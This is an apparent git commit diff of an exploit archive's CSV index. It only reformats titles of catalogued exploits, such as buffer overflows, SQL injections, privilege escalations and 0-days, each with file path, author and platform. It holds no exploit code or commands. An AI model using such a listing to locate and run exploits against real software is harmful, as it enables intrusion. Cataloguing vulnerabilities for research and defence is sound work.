Updated 08_06_2014

This commit is contained in:
Offensive Security 2014-08-06 04:39:53 +00:00
parent 396555d345
commit 545c6bdf18
13 changed files with 1326 additions and 539 deletions


@ -4506,7 +4506,7 @@ id,file,description,date,author,platform,type,port
4863,platforms/php/webapps/4863.pl,"SmallNuke 2.0.4 Pass Recovery Remote SQL Injection Exploit",2008-01-08,"Eugene Minaev",php,webapps,0
4864,platforms/php/webapps/4864.txt,"Zero CMS 1.0 - Alpha Arbitrary File Upload / SQL Injection Vulnerabilities",2008-01-08,KiNgOfThEwOrLd,php,webapps,0
4865,platforms/php/webapps/4865.txt,"evilboard 0.1a (sql/xss) Multiple Vulnerabilities",2008-01-08,seaofglass,php,webapps,0
4866,platforms/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing Remote Stack Overflow Exploit",2008-01-08,ryujin,windows,remote,0
4866,platforms/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing - Remote Stack Overflow Exploit",2008-01-08,ryujin,windows,remote,0
4867,platforms/php/webapps/4867.pl,"PHP Webquest 2.6 (id_actividad) Remote SQL Injection Exploit",2008-01-08,ka0x,php,webapps,0
4868,platforms/windows/remote/4868.html,"Move Networks Quantum Streaming Player - SEH Overwrite Exploit",2008-01-08,Elazar,windows,remote,0
4869,platforms/windows/remote/4869.html,"Gateway Weblaunch ActiveX Control Insecure Method Exploit",2008-01-08,Elazar,windows,remote,0
@ -4870,7 +4870,7 @@ id,file,description,date,author,platform,type,port
5232,platforms/php/webapps/5232.txt,"Mapbender <= 2.4.4 (mapFiler.php) Remote Code Execution Vulnerability",2008-03-11,"RedTeam Pentesting",php,webapps,0
5233,platforms/php/webapps/5233.txt,"Mapbender 2.4.4 - (gaz) Remote SQL Injection Vulnerability",2008-03-11,"RedTeam Pentesting",php,webapps,0
5234,platforms/php/webapps/5234.txt,"Bloo <= 1.00 Multiple Remote SQL Injection Vulnerabilities",2008-03-11,MhZ91,php,webapps,0
5235,platforms/windows/dos/5235.py,"MailEnable SMTP Service VRFY/EXPN Command Buffer Overflow DoS",2008-03-11,ryujin,windows,dos,0
5235,platforms/windows/dos/5235.py,"MailEnable SMTP Service - VRFY/EXPN Command Buffer Overflow DoS",2008-03-11,ryujin,windows,dos,0
5236,platforms/php/webapps/5236.txt,"phpBB Mod FileBase (id) Remote SQL Injection Vulnerability",2008-03-11,t0pP8uZz,php,webapps,0
5237,platforms/php/webapps/5237.txt,"Joomla Component ProductShowcase <= 1.5 - SQL Injection Vulnerability",2008-03-11,S@BUN,php,webapps,0
5238,platforms/windows/remote/5238.py,"Motorola Timbuktu Pro 8.6.5/8.7 Path Traversal / Log Injection Exploit",2008-03-11,"Core Security",windows,remote,0
@ -4883,7 +4883,7 @@ id,file,description,date,author,platform,type,port
5245,platforms/php/webapps/5245.txt,"XOOPS Module tutorials (printpage.php) SQL Injection Vulnerability",2008-03-12,S@BUN,php,webapps,0
5246,platforms/php/webapps/5246.txt,"easycalendar <= 4.0tr Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0
5247,platforms/php/webapps/5247.txt,"easygallery <= 5.0tr Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0
5248,platforms/windows/remote/5248.py,"MDaemon IMAP server 9.6.4 (FETCH) Remote Buffer Overflow Exploit",2008-03-13,ryujin,windows,remote,143
5248,platforms/windows/remote/5248.py,"MDaemon IMAP server 9.6.4 - (FETCH) Remote Buffer Overflow Exploit",2008-03-13,ryujin,windows,remote,143
5249,platforms/windows/remote/5249.pl,"MailEnable Pro/Ent <= 3.13 (Fetch) post-auth Remote BOF Exploit",2008-03-14,haluznik,windows,remote,0
5250,platforms/windows/local/5250.cpp,"VLC <= 0.8.6e Subtitle Parsing Local Buffer Overflow Exploit",2008-03-14,"Mai Xuan Cuong",windows,local,0
5252,platforms/php/webapps/5252.txt,"eXV2 Module MyAnnonces - (lid) Remote SQL Injection Vulnerability",2008-03-14,S@BUN,php,webapps,0
@ -4893,7 +4893,7 @@ id,file,description,date,author,platform,type,port
5256,platforms/php/webapps/5256.pl,"AuraCMS <= 2.2.1 (online.php) Remote Blind SQL Injection Exploit",2008-03-14,NTOS-Team,php,webapps,0
5257,platforms/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit",2008-03-14,kingcope,multiple,remote,0
5258,platforms/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster rpc.metad Denial of Service PoC",2008-03-14,kingcope,solaris,dos,0
5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 IMAP post-auth Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143
5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP post-auth Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143
5260,platforms/php/webapps/5260.txt,"fuzzylime cms <= 3.01 (admindir) Remote File Inclusion Vulnerability",2008-03-14,irk4z,php,webapps,0
5261,platforms/windows/dos/5261.py,"Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow PoC",2008-03-15,"Wiktor Sierocinski",windows,dos,0
5262,platforms/php/webapps/5262.txt,"mutiple timesheets <= 5.0 - Multiple Vulnerabilities",2008-03-16,JosS,php,webapps,0
@ -5371,7 +5371,7 @@ id,file,description,date,author,platform,type,port
5748,platforms/php/webapps/5748.txt,"Joomla Component JoomlaDate (user) SQL injection Vulnerability",2008-06-05,His0k4,php,webapps,0
5749,platforms/multiple/dos/5749.pl,"Asterisk (SIP channel driver / in pedantic mode) Remote Crash Exploit",2008-06-05,"Armando Oliveira",multiple,dos,0
5750,platforms/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK (BIDIB.ocx) Multiple Vulns",2008-06-05,shinnai,windows,remote,0
5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 (Post Auth) Remote SEH Overflow Exploit",2008-06-06,ryujin,windows,remote,22
5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - (Post Auth) Remote SEH Overflow Exploit",2008-06-06,ryujin,windows,remote,22
5752,platforms/php/webapps/5752.pl,"Joomla Component GameQ <= 4.0 - Remote SQL injection Vulnerability",2008-06-07,His0k4,php,webapps,0
5753,platforms/asp/webapps/5753.txt,"JiRo?s FAQ Manager (read.asp fID) 1.0 - SQL Injection Vulnerability",2008-06-08,Zigma,asp,webapps,0
5754,platforms/php/webapps/5754.txt,"phpinv 0.8.0 (lfi/xss) Multiple Vulnerabilities",2008-06-08,"CWH Underground",php,webapps,0
@ -8425,7 +8425,7 @@ id,file,description,date,author,platform,type,port
8931,platforms/php/webapps/8931.txt,"TorrentVolve 1.4 (deleteTorrent) Delete Arbitrary File Vulnerability",2009-06-11,Br0ly,php,webapps,0
8932,platforms/php/webapps/8932.txt,"yogurt 0.3 (xss/SQL Injection) Multiple Vulnerabilities",2009-06-11,Br0ly,php,webapps,0
8933,platforms/php/webapps/8933.php,"Sniggabo CMS (article.php id) Remote SQL Injection Exploit",2009-06-11,Lidloses_Auge,php,webapps,0
8934,platforms/windows/remote/8934.py,"Apple iTunes 8.1.1.10 (itms/itcp) Remote Buffer Overflow Exploit (win)",2009-06-12,ryujin,windows,remote,0
8934,platforms/windows/remote/8934.py,"Apple iTunes 8.1.1.10 - (itms/itcp) Remote Buffer Overflow Exploit (win)",2009-06-12,ryujin,windows,remote,0
8935,platforms/php/webapps/8935.txt,"Zip Store Chat 4.0/5.0 (Auth Bypass) SQL Injection Vulnerability",2009-06-12,ByALBAYX,php,webapps,0
8936,platforms/php/webapps/8936.txt,"4images <= 1.7.7 Filter Bypass HTML Injection/XSS Vulnerability",2009-06-12,Qabandi,php,webapps,0
8937,platforms/php/webapps/8937.txt,"campus virtual-lms (xss/SQL Injection) Multiple Vulnerabilities",2009-06-12,Yasión,php,webapps,0
@ -9425,7 +9425,7 @@ id,file,description,date,author,platform,type,port
10059,platforms/jsp/webapps/10059.txt,"McAfee Network Security Manager < 5.1.11.8.1 - Information Disclosure Vulnerability",2009-11-12,"Daniel King",jsp,webapps,0
10060,platforms/linux/local/10060.sh,"Geany .18 Local File Overwrite",2009-10-06,"Jeremy Brown",linux,local,0
10061,platforms/jsp/webapps/10061.txt,"McAfee Network Security Manager < 5.1.11.8.1 - Multiple Cross Site Scripting Vulnerabilities",2009-11-12,"Daniel King",jsp,webapps,0
10062,platforms/windows/dos/10062.py,"Novell eDirectory 883ftf3 nldap module Denial of Service",2009-11-16,ryujin,windows,dos,389
10062,platforms/windows/dos/10062.py,"Novell eDirectory 883ftf3 - nldap module Denial of Service",2009-11-16,ryujin,windows,dos,389
10064,platforms/php/webapps/10064.txt,"Joomla CB Resume Builder - SQL Injection",2009-10-05,kaMtiEz,php,webapps,0
10067,platforms/php/webapps/10067.txt,"Joomla Soundset 1.0 - SQL Injection",2009-10-05,kaMtiEz,php,webapps,0
10068,platforms/windows/dos/10068.rb,"Microsoft Windows 2000-2008 - Embedded OpenType Font Engine Remote Code Execution",2009-11-12,"H D Moore",windows,dos,0
@ -9457,7 +9457,7 @@ id,file,description,date,author,platform,type,port
10095,platforms/multiple/remote/10095.txt,"Samba 3.0.10 - 3.3.5 Format String And Security Bypass Vulnerabilities",2009-11-13,"Jeremy Allison",multiple,remote,0
10096,platforms/php/webapps/10096.txt,"OS Commerce 2.2r2 authentication bypass",2009-11-13,"Stuart Udall",php,webapps,0
10097,platforms/php/remote/10097.php,"PHP 5.2.11/5.3.0 - Multiple Vulnerabilities",2009-11-13,"Maksymilian Arciemowicz",php,remote,0
10098,platforms/windows/remote/10098.py,"Novell eDirectory 8.8 SP5 iConsole Buffer Overflow",2009-11-16,ryujin,windows,remote,0
10098,platforms/windows/remote/10098.py,"Novell eDirectory 8.8 SP5 - iConsole Buffer Overflow",2009-11-16,ryujin,windows,remote,0
10099,platforms/windows/remote/10099.py,"HP Power Manager Administration - Universal Buffer Overflow Exploit",2009-11-16,ryujin,windows,remote,80
10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 (LIST) Remote Denial of Service Exploit",2007-03-20,shinnai,windows,dos,21
10101,platforms/php/webapps/10101.txt,"telepark wiki 2.4.23 - Multiple Vulnerabilities",2009-11-16,Abysssec,php,webapps,0
@ -9544,7 +9544,7 @@ id,file,description,date,author,platform,type,port
10252,platforms/php/webapps/10252.txt,"Joomla Component Quick News SQL Injection Vulnerability",2009-11-30,"Don Tukulesto",php,webapps,0
10253,platforms/asp/webapps/10253.txt,"Eshopbuilde CMS SQL Injection Vulnerability",2009-11-30,Isfahan,asp,webapps,0
10254,platforms/asp/webapps/10254.txt,"Xxasp 3.3.2 - SQL Injection",2009-11-30,Secu_lab_ir,asp,webapps,0
10255,platforms/bsd/local/10255.txt,"FreeBSD Run-Time Link-Editor Local r00t Zeroday",2009-11-30,kingcope,bsd,local,0
10255,platforms/bsd/local/10255.txt,"FreeBSD Run-Time Link-Editor Local r00t (0day)",2009-11-30,kingcope,bsd,local,0
10256,platforms/php/webapps/10256.txt,"WP-Polls 2.x Incorrect Flood Filter",2009-11-30,Jbyte,php,webapps,0
10257,platforms/windows/dos/10257.py,"XM Easy Professional FTP Server 5.8.0 - Denial of Service",2009-11-30,"Mert SARICA",windows,dos,21
10258,platforms/windows/remote/10258.pl,"Golden FTP Server 4.30 File Deletion Vulnerability",2009-12-01,sharpe,windows,remote,21
@ -11114,7 +11114,7 @@ id,file,description,date,author,platform,type,port
12186,platforms/php/webapps/12186.pl,"vBulletin DoS - all version",2010-04-12,"Jim Salim",php,webapps,0
12187,platforms/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 beta (RFI/LFI) Multiple File Include Vulnerability",2010-04-12,"cr4wl3r ",php,webapps,0
12188,platforms/multiple/dos/12188.txt,"VMware Remote Console e.x.p build-158248 - format string vulnerability",2010-04-12,"Alexey Sintsov",multiple,dos,0
12189,platforms/windows/local/12189.php,"PHP 6.0 Dev str_transliterate() Buffer overflow - NX + ASLR Bypass",2010-04-13,ryujin,windows,local,0
12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0
12190,platforms/php/webapps/12190.txt,"Joomla Component Jvehicles (aid) SQL Injection Vulnerability",2010-04-13,"Don Tukulesto",php,webapps,0
12191,platforms/php/webapps/12191.txt,"joomla component com_jp_jobs 1.2.0 - (id) SQL Injection Vulnerability",2010-04-13,v3n0m,php,webapps,0
12192,platforms/php/webapps/12192.txt,"blog system <= 1.5 - Multiple Vulnerabilities",2010-04-13,"cp77fk4r ",php,webapps,0
@ -11297,7 +11297,7 @@ id,file,description,date,author,platform,type,port
12402,platforms/php/webapps/12402.txt,"Kasseler CMS 2.0.5 - Bypass / Download Backup Vulnerability",2010-04-26,indoushka,php,webapps,0
12403,platforms/windows/local/12403.py,"IDEAL Administration 2010 10.2 - Local Buffer Overflow Exploit",2010-04-26,Dr_IDE,windows,local,0
12404,platforms/windows/local/12404.py,"IDEAL Migration 2009 4.5.1 - Local Buffer Overflow Exploit",2010-04-26,Dr_IDE,windows,local,0
12406,platforms/windows/local/12406.py,"Avast! 4.7 aavmker4.sys privilege escalation",2010-04-27,ryujin,windows,local,0
12406,platforms/windows/local/12406.py,"Avast! 4.7 - aavmker4.sys Privilege Escalation",2010-04-27,ryujin,windows,local,0
12407,platforms/php/webapps/12407.txt,"CMScout 2.08 SQL Injection Vulnerability",2010-04-26,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
12408,platforms/windows/dos/12408.pl,"Safari 4.0.5 (531.22.7) Denial of Service",2010-04-26,"Xss mAn",windows,dos,0
12410,platforms/php/webapps/12410.txt,"PostNuke 0.764 Module modload SQL Injection Vulnerability",2010-04-26,BILGE_KAGAN,php,webapps,0
@ -13361,7 +13361,7 @@ id,file,description,date,author,platform,type,port
15418,platforms/windows/dos/15418.html,"Internet Explorer Memory Corruption 0day Vulnerability",2010-11-04,Unknown,windows,dos,0
15419,platforms/windows/dos/15419.txt,"Acrobat Reader 9.4 - Memory Corruption Vulnerability",2010-11-04,scup,windows,dos,0
15420,platforms/windows/dos/15420.c,"Avast! Internet Security aswtdi.sys 0day Local DoS PoC",2010-11-04,"Nikita Tarakanov",windows,dos,0
15421,platforms/windows/remote/15421.html,"Internet Explorer 6, 7, 8 Memory Corruption 0day Exploit",2010-11-04,ryujin,windows,remote,0
15421,platforms/windows/remote/15421.html,"Internet Explorer 6, 7, 8 - Memory Corruption Exploit (0day)",2010-11-04,ryujin,windows,remote,0
15422,platforms/windows/dos/15422.pl,"Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit",2010-11-05,wingthor,windows,dos,0
15423,platforms/android/remote/15423.html,"Android 2.0-2.1 - Reverse Shell Exploit",2010-11-05,"MJ Keith",android,remote,0
15426,platforms/windows/dos/15426.txt,"Adobe Flash ActionIf Integer Denial of Service Vulnerability",2010-11-05,"Matthew Bergin",windows,dos,0
@ -15573,7 +15573,7 @@ id,file,description,date,author,platform,type,port
17970,platforms/php/webapps/17970.txt,"WP-SpamFree WordPress Spam Plugin SQL Injection Vulnerability",2011-10-11,cheki,php,webapps,0
17972,platforms/php/webapps/17972.txt,"MyBB MyStatus 3.1 - SQL Injection Vulnerability",2011-10-12,Mario_Vs,php,webapps,0
17973,platforms/php/webapps/17973.txt,"WordPress GD Star Rating plugin <= 1.9.10 SQL Injection",2011-10-12,"Miroslav Stampar",php,webapps,0
17974,platforms/windows/remote/17974.html,"Mozilla Firefox Array.reduceRight() Integer Overflow Exploit",2011-10-12,ryujin,windows,remote,0
17974,platforms/windows/remote/17974.html,"Mozilla Firefox - Array.reduceRight() Integer Overflow Exploit",2011-10-12,ryujin,windows,remote,0
17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability",2011-10-12,metasploit,windows,remote,0
17976,platforms/windows/remote/17976.rb,"Mozilla Firefox Array.reduceRight() Integer Overflow",2011-10-13,metasploit,windows,remote,0
17977,platforms/windows/remote/17977.txt,"JBoss AS 2.0 - Remote Exploit",2011-10-11,kingcope,windows,remote,0
@ -20276,14 +20276,14 @@ id,file,description,date,author,platform,type,port
23072,platforms/php/webapps/23072.txt,"Ezboard 'invitefriends.php3' Cross Site Scripting Vulnerability",2003-09-01,"David F. Madrid",php,webapps,0
23073,platforms/windows/remote/23073.txt,"MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)",2012-12-02,kingcope,windows,remote,0
23074,platforms/windows/remote/23074.txt,"IBM System Director Remote System Level Exploit",2012-12-02,kingcope,windows,remote,0
23075,platforms/linux/dos/23075.pl,"MySQL (Linux) Stack Based Buffer Overrun PoC Zeroday",2012-12-02,kingcope,linux,dos,0
23076,platforms/linux/dos/23076.pl,"MySQL (Linux) Heap Based Overrun PoC Zeroday",2012-12-02,kingcope,linux,dos,0
23077,platforms/linux/local/23077.pl,"MySQL (Linux) Database Privilege Elevation Zeroday Exploit",2012-12-02,kingcope,linux,local,0
23078,platforms/linux/dos/23078.txt,"MySQL Denial of Service Zeroday PoC",2012-12-02,kingcope,linux,dos,0
23079,platforms/windows/remote/23079.txt,"FreeFTPD Remote Authentication Bypass Zeroday Exploit",2012-12-02,kingcope,windows,remote,0
23080,platforms/windows/remote/23080.txt,"FreeSSHD Remote Authentication Bypass Zeroday Exploit",2012-12-02,kingcope,windows,remote,0
23081,platforms/multiple/remote/23081.pl,"MySQL Remote Preauth User Enumeration Zeroday",2012-12-02,kingcope,multiple,remote,0
23082,platforms/linux/remote/23082.txt,"SSH.com Communications SSH Tectia Authentication Bypass Remote Zeroday Exploit",2012-12-02,kingcope,linux,remote,0
23075,platforms/linux/dos/23075.pl,"MySQL (Linux) - Stack Based Buffer Overrun PoC (0day)",2012-12-02,kingcope,linux,dos,0
23076,platforms/linux/dos/23076.pl,"MySQL (Linux) - Heap Based Overrun PoC (0day)",2012-12-02,kingcope,linux,dos,0
23077,platforms/linux/local/23077.pl,"MySQL (Linux) - Database Privilege Elevation Exploit (0day)",2012-12-02,kingcope,linux,local,0
23078,platforms/linux/dos/23078.txt,"MySQL - Denial of Service PoC (0day)",2012-12-02,kingcope,linux,dos,0
23079,platforms/windows/remote/23079.txt,"FreeFTPD - Remote Authentication Bypass Exploit (0day)",2012-12-02,kingcope,windows,remote,0
23080,platforms/windows/remote/23080.txt,"FreeSSHD - Remote Authentication Bypass Exploit (0day)",2012-12-02,kingcope,windows,remote,0
23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Preauth User Enumeration (0day)",2012-12-02,kingcope,multiple,remote,0
23082,platforms/linux/remote/23082.txt,"SSH.com Communications SSH Tectia Authentication Bypass Remote Exploit (0day)",2012-12-02,kingcope,linux,remote,0
23083,platforms/windows/remote/23083.txt,"MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day",2012-12-02,kingcope,windows,remote,0
23084,platforms/php/webapps/23084.txt,"TSguestbook 2.1 Message Field HTML Injection Vulnerability",2003-09-01,Trash-80,php,webapps,0
23085,platforms/cgi/webapps/23085.html,"Sitebuilder 1.4 'sitebuilder.cgi' Directory Traversal File Disclosure Vulnerability",2003-09-01,"Zero X",cgi,webapps,0
@ -21608,7 +21608,7 @@ id,file,description,date,author,platform,type,port
24455,platforms/unix/remote/24455.rb,"Portable UPnP SDK unique_service_name() Remote Code Execution",2013-02-05,metasploit,unix,remote,0
24456,platforms/php/webapps/24456.txt,"glossword 1.8.12 - Multiple Vulnerabilities",2013-02-05,AkaStep,php,webapps,0
24457,platforms/php/webapps/24457.txt,"Glossword 1.8.3 - SQL Injection Vulnerability",2013-02-05,AkaStep,php,webapps,0
24458,platforms/linux/local/24458.txt,"Oracle Automated Service Manager 1.3 Installation Local Privilege Escalation",2013-02-05,"Larry W. Cashdollar",linux,local,0
24458,platforms/linux/local/24458.txt,"Oracle Automated Service Manager 1.3 - Installation Local Privilege Escalation",2013-02-05,"Larry W. Cashdollar",linux,local,0
24459,platforms/linux/dos/24459.sh,"Linux Kernel /dev/ptmx Key Stroke Timing Local Disclosure",2013-02-05,vladz,linux,dos,0
24460,platforms/windows/remote/24460.rb,"VMWare OVF Tools Format String Vulnerability",2013-02-06,metasploit,windows,remote,0
24461,platforms/windows/remote/24461.rb,"VMWare OVF Tools Format String Vulnerability",2013-02-12,metasploit,windows,remote,0
@ -21686,7 +21686,7 @@ id,file,description,date,author,platform,type,port
24550,platforms/hardware/webapps/24550.txt,"WiFilet 1.2 iPad iPhone - Multiple Vulnerabilities",2013-02-26,Vulnerability-Lab,hardware,webapps,0
24551,platforms/php/webapps/24551.txt,"Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability",2013-02-27,EgiX,php,webapps,0
24552,platforms/php/webapps/24552.txt,"Wordpress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities",2013-02-27,ebanyu,php,webapps,0
24555,platforms/linux/local/24555.c,"Archlinux x86-64 3.3.x-3.7.x x86-64 sock_diag_handlers[] Local Root",2013-02-27,sd,linux,local,0
24555,platforms/linux/local/24555.c,"Archlinux x86-64 3.3.x-3.7.x x86-64 - sock_diag_handlers[] Local Root",2013-02-27,sd,linux,local,0
24556,platforms/windows/dos/24556.py,"Hanso Player 2.1.0 (.m3u) - Buffer Overflow Vulnerability",2013-03-01,metacom,windows,dos,0
24557,platforms/windows/remote/24557.py,"Sami FTP Server 2.0.1 LIST Command Buffer Overflow",2013-03-01,superkojiman,windows,remote,0
24560,platforms/php/webapps/24560.txt,"doorGets CMS - CSRF Vulnerability",2013-03-01,n0pe,php,webapps,0
@ -22039,7 +22039,7 @@ id,file,description,date,author,platform,type,port
24926,platforms/hardware/webapps/24926.txt,"Multiple D-Link Devices - Multiple Vulnerabilities",2013-04-08,m-1-k-3,hardware,webapps,0
24927,platforms/php/webapps/24927.txt,"Vanilla Forums 2-0-18-4 - SQL-Injection Vulnerability",2013-04-08,bl4ckw0rm,php,webapps,0
24928,platforms/hardware/webapps/24928.txt,"TP-Link TD-8817 6.0.1 Build 111128 Rel.26763 - CSRF Vulnerability",2013-04-08,Un0wn_X,hardware,webapps,0
24929,platforms/linux/local/24929.rb,"HP System Management Homepage Local Privilege Escalation",2013-04-08,metasploit,linux,local,0
24929,platforms/linux/local/24929.rb,"HP System Management Homepage - Local Privilege Escalation",2013-04-08,metasploit,linux,local,0
24930,platforms/windows/dos/24930.txt,"Groovy Media Player 3.2.0 (.mp3) - Buffer Overflow Vulnerability",2013-04-08,"Akshaysinh Vaghela",windows,dos,0
24931,platforms/hardware/remote/24931.rb,"Netgear DGN1000B setup.cgi Remote Command Execution",2013-04-08,metasploit,hardware,remote,0
24932,platforms/linux/webapps/24932.txt,"Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities",2013-04-08,"SEC Consult",linux,webapps,0
@ -23071,7 +23071,7 @@ id,file,description,date,author,platform,type,port
25983,platforms/cfm/webapps/25983.txt,"Simple Message Board 2.0 beta1 User.CFM Cross-Site Scripting Vulnerability",2005-07-14,rUnViRuS,cfm,webapps,0
25984,platforms/cfm/webapps/25984.txt,"Simple Message Board 2.0 beta1 Thread.CFM Cross-Site Scripting Vulnerability",2005-07-14,rUnViRuS,cfm,webapps,0
25985,platforms/cfm/webapps/25985.txt,"Simple Message Board 2.0 beta1 Search.CFM Cross-Site Scripting Vulnerability",2005-07-14,rUnViRuS,cfm,webapps,0
25986,platforms/php/remote/25986.txt,"Plesk < 9.5.4 - Zeroday Remote Exploit",2013-06-05,kingcope,php,remote,0
25986,platforms/php/remote/25986.txt,"Plesk < 9.5.4 - Remote Exploit (0day)",2013-06-05,kingcope,php,remote,0
25987,platforms/hardware/remote/25987.txt,"Xpient Cash Drawer Operation Vulnerability",2013-06-05,"Core Security",hardware,remote,0
25988,platforms/multiple/remote/25988.txt,"Oracle9i Application Server 9.0.2 MOD_ORADAV Access Control Vulnerability",2003-02-13,"David Litchfield",multiple,remote,0
25989,platforms/windows/remote/25989.txt,"Nullsoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow Vulnerability",2005-07-15,"Leon Juranic",windows,remote,0
@ -23522,7 +23522,7 @@ id,file,description,date,author,platform,type,port
26448,platforms/windows/local/26448.py,"AudioCoder 0.8.22 (.lst) - Direct Retn Buffer Overflow",2013-06-26,Onying,windows,local,0
26449,platforms/php/webapps/26449.txt,"e107 Advanced Medal System Plugin - SQL Injection Vulnerability",2013-06-26,"Life Wasted",php,webapps,0
26450,platforms/windows/dos/26450.pl,"Baby FTP Server 1.24 - Denial of Service",2013-06-26,Chako,windows,dos,21
26451,platforms/linux/local/26451.rb,"ZPanel zsudo Local Privilege Escalation Exploit",2013-06-26,metasploit,linux,local,0
26451,platforms/linux/local/26451.rb,"ZPanel zsudo - Local Privilege Escalation Exploit",2013-06-26,metasploit,linux,local,0
26452,platforms/win32/local/26452.rb,"Novell Client 2 SP3 nicm.sys Local Privilege Escalation",2013-06-26,metasploit,win32,local,0
26453,platforms/php/webapps/26453.py,"PHP Charts 1.0 (index.php, type param) - Remote Code Execution",2013-06-26,infodox,php,webapps,0
26454,platforms/freebsd/local/26454.rb,"FreeBSD 9 Address Space Manipulation Privilege Escalation",2013-06-26,metasploit,freebsd,local,0
@ -24964,7 +24964,7 @@ id,file,description,date,author,platform,type,port
27932,platforms/asp/webapps/27932.txt,"Hogstorps Guestbook 2.0 Unauthorized Access Vulnerability",2006-05-01,omnipresent,asp,webapps,0
27933,platforms/php/webapps/27933.txt,"Tekno.Portal Bolum.PHP SQL Injection Vulnerability",2006-06-01,SpC-x,php,webapps,0
27934,platforms/php/webapps/27934.txt,"Abarcar Realty Portal 5.1.5 Content.PHP SQL Injection Vulnerability",2006-06-01,SpC-x,php,webapps,0
27938,platforms/linux/local/27938.rb,"VMWare Setuid vmware-mount Unsafe popen(3)",2013-08-29,metasploit,linux,local,0
27938,platforms/linux/local/27938.rb,"VMWare - Setuid vmware-mount Unsafe popen(3)",2013-08-29,metasploit,linux,local,0
27939,platforms/windows/remote/27939.rb,"HP LoadRunner lrFileIOService ActiveX Remote Code Execution",2013-08-29,metasploit,windows,remote,0
27940,platforms/windows/remote/27940.rb,"Firefox XMLSerializer Use After Free",2013-08-29,metasploit,windows,remote,0
27941,platforms/php/remote/27941.rb,"SPIP connect Parameter PHP Injection",2013-08-29,metasploit,php,remote,0
@ -25344,7 +25344,7 @@ id,file,description,date,author,platform,type,port
28329,platforms/php/webapps/28329.txt,"OpenEMR 4.1.1 Patch 14 - Multiple Vulnerabilities",2013-09-17,xistence,php,webapps,0
28330,platforms/php/webapps/28330.txt,"Western Digital Arkeia Appliance 10.0.10 - Multiple Vulnerabilities",2013-09-17,xistence,php,webapps,0
28331,platforms/windows/remote/28331.txt,"Oracle Java ShortComponentRaster.verify() Memory Corruption",2013-09-17,"Packet Storm",windows,remote,0
28332,platforms/linux/local/28332.rb,"Sophos Web Protection Appliance clear_keys.pl Local Privilege Escalation",2013-09-17,metasploit,linux,local,0
28332,platforms/linux/local/28332.rb,"Sophos Web Protection Appliance - clear_keys.pl Local Privilege Escalation",2013-09-17,metasploit,linux,local,0
28333,platforms/unix/remote/28333.rb,"D-Link Devices UPnP SOAP Telnetd Command Execution",2013-09-17,metasploit,unix,remote,49152
28334,platforms/linux/remote/28334.rb,"Sophos Web Protection Appliance sblistpack Arbitrary Command Execution",2013-09-17,metasploit,linux,remote,443
28335,platforms/windows/local/28335.rb,"Agnitum Outpost Internet Security Local Privilege Escalation",2013-09-17,metasploit,windows,local,0
@ -29437,7 +29437,7 @@ id,file,description,date,author,platform,type,port
32697,platforms/linux/dos/32697.pl,"aMSN '.ctt' File Remote Denial of Service Vulnerability",2009-01-03,Hakxer,linux,dos,0
32698,platforms/php/webapps/32698.txt,"SolucionXpressPro 'main.php' SQL Injection Vulnerability",2009-01-05,Ehsan_Hp200,php,webapps,0
32699,platforms/windows/remote/32699.txt,"Google Chrome 1.0.154.36 - FTP Client PASV Port Scan Information Disclosure Vulnerability",2009-01-05,"Aditya K Sood",windows,remote,0
32700,platforms/linux/local/32700.rb,"ibstat $PATH Privilege Escalation",2014-04-04,metasploit,linux,local,0
32700,platforms/linux/local/32700.rb,"ibstat $PATH - Privilege Escalation",2014-04-04,metasploit,linux,local,0
32701,platforms/php/webapps/32701.txt,"Wordpress XCloner Plugin 3.1.0 - CSRF Vulnerability",2014-04-04,"High-Tech Bridge SA",php,webapps,80
32702,platforms/hardware/dos/32702.txt,"A10 Networks ACOS 2.7.0-P2(build: 53) - Buffer Overflow",2014-04-04,"Francesco Perna",hardware,dos,80
32703,platforms/ios/webapps/32703.txt,"Private Photo+Video 1.1 Pro iOS - Persistent Vulnerability",2014-04-05,Vulnerability-Lab,ios,webapps,0
@ -30456,7 +30456,7 @@ id,file,description,date,author,platform,type,port
33804,platforms/windows/dos/33804.pl,"Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability",2014-06-18,LiquidWorm,windows,dos,0
33805,platforms/linux/remote/33805.pl,"AlienVault OSSIM < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution",2014-06-18,"Alfredo Ramirez",linux,remote,0
33807,platforms/multiple/remote/33807.rb,"Rocket Servergraph Admin Center fileRequestor Remote Code Execution",2014-06-18,metasploit,multiple,remote,8888
33808,platforms/linux/local/33808.c,"docker 0.11 VMM-container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
33808,platforms/linux/local/33808.c,"docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
33809,platforms/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,php,webapps,0
